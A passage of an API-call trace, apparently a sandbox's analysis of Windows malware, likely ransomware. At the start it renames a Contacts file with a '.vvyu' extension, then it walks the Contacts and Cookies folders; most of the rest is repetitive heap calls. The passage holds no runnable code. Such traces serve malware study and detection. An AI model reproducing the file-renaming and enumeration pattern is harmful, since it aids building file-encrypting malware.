lpNewFileName="C:\\Users\\kEecfMwgj\\Contacts\\Administrator.contact.vvyu" (normalized: "c:\\users\\keecfmwgj\\contacts\\administrator.contact.vvyu")) returned 1 [0182.994] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x7996bf30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e7f9530, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x19c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0182.994] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Contacts\\desktop.ini") returned=".ini" [0182.995] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x7996bf30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e7f9530, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x19c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0182.995] FindClose (in: hFindFile=0x2cbfa10 | out: hFindFile=0x2cbfa10) returned 1 [0182.995] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27b58 | out: hHeap=0x6a0000) returned 1 [0182.996] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f4c8 | out: hHeap=0x6a0000) returned 1 [0182.996] PeekMessageW (in: lpMsg=0x30fff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fff08) returned 0 [0182.996] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0182.996] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Cookies\\") returned="Cookies\\" [0182.996] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27b58 [0182.996] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0182.996] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f3a8 | out: hHeap=0x6a0000) returned 1 [0182.996] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0182.996] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0182.997] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0182.997] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0182.997] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0182.997] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0182.997] PathFindFileNameW (pszPath="") returned="" [0182.997] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f3a8 [0182.997] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Cookies\\*" (normalized: "c:\\users\\keecfmwgj\\cookies\\*"), lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x7996bf30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e7f9530, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x19c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0xffffffff [0182.998] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f3a8 | out: hHeap=0x6a0000) returned 1 [0182.999] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27b58 | out: hHeap=0x6a0000) returned 1 [0182.999] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f4c8 | out: hHeap=0x6a0000) returned 1 [0182.999] PeekMessageW (in: lpMsg=0x30fff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fff08) returned 0 [0182.999] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f4c8 [0182.999] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0182.999] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f3a8 [0182.999] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0182.999] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0183.000] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f3a8 | out: hHeap=0x6a0000) returned 1 [0183.000] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f3a8 [0183.000] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0183.000] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0183.000] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f3a8 | out: hHeap=0x6a0000) returned 1 [0183.000] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f3a8 [0183.000] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0183.001] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0183.001] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f3a8 | out: hHeap=0x6a0000) returned 1 [0183.001] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f3a8 [0183.001] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0183.001] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0183.002] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f3a8 | out: hHeap=0x6a0000) returned 1 [0183.002] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f3a8 [0183.002] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0183.002] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0183.002] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f3a8 | out: hHeap=0x6a0000) returned 1 [0183.002] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f3a8 [0183.002] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0183.003] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0183.003] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f3a8 | out: hHeap=0x6a0000) returned 1 [0183.003] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f3a8 [0183.003] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0183.003] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d2ec90 [0183.003] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0183.004] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0183.004] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f3a8 | out: hHeap=0x6a0000) returned 1 [0183.004] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f3a8 [0183.004] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0183.005] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0183.005] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f3a8 | out: hHeap=0x6a0000) returned 1 [0183.005] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f3a8 [0183.005] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0183.005] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0183.005] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f3a8 | out: hHeap=0x6a0000) returned 1 [0183.006] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f3a8 [0183.006] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0183.006] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0183.006] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f3a8 | out: hHeap=0x6a0000) returned 1 [0183.006] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f3a8 [0183.006] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0183.007] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0183.007] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f3a8 | out: hHeap=0x6a0000) returned 1 [0183.007] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f3a8 [0183.007] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0183.007] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0183.008] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f3a8 | out: hHeap=0x6a0000) returned 1 [0183.008] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f3a8 [0183.008] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0183.008] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0183.008] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f3a8 | out: hHeap=0x6a0000) returned 1 [0183.008] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f3a8 [0183.008] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0183.009] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0183.009] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f3a8 | out: hHeap=0x6a0000) returned 1 [0183.009] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f3a8 [0183.009] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0183.009] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0183.010] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f3a8 | out: hHeap=0x6a0000) returned 1 [0183.010] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f3a8 [0183.010] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0183.010] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0183.011] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f3a8 | out: hHeap=0x6a0000) returned 1 [0183.011] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f3a8 [0183.011] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0183.011] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0183.011] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f3a8 | out: hHeap=0x6a0000) returned 1 [0183.011] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f3a8 [0183.011] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0183.012] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0183.012] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f3a8 | out: hHeap=0x6a0000) returned 1 [0183.012] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f3a8 [0183.012] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0183.013] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0183.013] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f3a8 | out: hHeap=0x6a0000) returned 1 [0183.013] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f3a8 [0183.013] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0183.013] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0183.014] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f3a8 | out: hHeap=0x6a0000) returned 1 [0183.014] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f3a8 [0183.014] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0183.014] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0183.014] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f3a8 | out: hHeap=0x6a0000) returned 1 [0183.014] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f3a8 [0183.014] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0183.015] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0183.015] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f3a8 | out: hHeap=0x6a0000) returned 1 [0183.015] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f3a8 [0183.015] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0183.015] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0183.015] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0183.016] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0183.016] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f3a8 | out: hHeap=0x6a0000) returned 1 [0183.016] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f3a8 [0183.016] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0183.016] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0183.017] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f3a8 | out: hHeap=0x6a0000) returned 1 [0183.017] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f3a8 [0183.017] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0183.017] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d2ec90 [0183.017] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0183.017] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0183.018] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f3a8 | out: hHeap=0x6a0000) returned 1 [0183.018] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f3a8 [0183.018] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0183.018] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0183.018] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f3a8 | out: hHeap=0x6a0000) returned 1 [0183.018] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f3a8 [0183.018] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0183.019] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0183.019] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f3a8 | out: hHeap=0x6a0000) returned 1 [0183.019] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f3a8 [0183.019] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0183.019] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0183.020] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f3a8 | out: hHeap=0x6a0000) returned 1 [0183.020] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f3a8 [0183.020] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0183.020] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0183.020] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f3a8 | out: hHeap=0x6a0000) returned 1 [0183.020] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f3a8 [0183.020] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0183.020] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0183.021] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0183.021] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0183.021] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f3a8 | out: hHeap=0x6a0000) returned 1 [0183.021] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f3a8 [0183.021] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0183.022] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0183.022] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f3a8 | out: hHeap=0x6a0000) returned 1 [0183.022] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f3a8 [0183.022] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0183.022] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0183.023] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f3a8 | out: hHeap=0x6a0000) returned 1 [0183.023] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f3a8 [0183.023] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0183.023] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0183.023] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f3a8 | out: hHeap=0x6a0000) returned 1 [0183.023] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f3a8 [0183.023] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0183.024] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0183.024] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f3a8 | out: hHeap=0x6a0000) returned 1 [0183.024] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f3a8 [0183.024] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0183.024] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0183.025] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f3a8 | out: hHeap=0x6a0000) returned 1 [0183.025] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f3a8 [0183.025] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0183.025] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0183.026] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f3a8 | out: hHeap=0x6a0000) returned 1 [0183.026] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f3a8 [0183.026] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0183.026] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0183.026] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f3a8 | out: hHeap=0x6a0000) returned 1 [0183.027] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f3a8 [0183.027] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0183.027] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0183.027] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f3a8 | out: hHeap=0x6a0000) returned 1 [0183.027] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f3a8 [0183.027] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0183.028] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0183.028] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f3a8 | out: hHeap=0x6a0000) returned 1 [0183.028] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f3a8 [0183.028] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0183.028] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0183.028] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0183.029] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0183.029] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f3a8 | out: hHeap=0x6a0000) returned 1 [0183.029] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f3a8 [0183.029] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0183.029] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0183.030] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f3a8 | out: hHeap=0x6a0000) returned 1 [0183.030] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f3a8 [0183.030] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0183.030] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0183.030] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f3a8 | out: hHeap=0x6a0000) returned 1 [0183.030] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f3a8 [0183.030] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0183.031] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0183.031] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f3a8 | out: hHeap=0x6a0000) returned 1 [0183.031] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f3a8 [0183.031] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0183.032] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0183.032] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f3a8 | out: hHeap=0x6a0000) returned 1 [0183.032] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f3a8 [0183.032] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0183.032] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0183.032] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f3a8 | out: hHeap=0x6a0000) returned 1 [0183.032] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f3a8 [0183.032] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0183.033] RtlAllocateHeap (HeapHandle=0x6a0000, 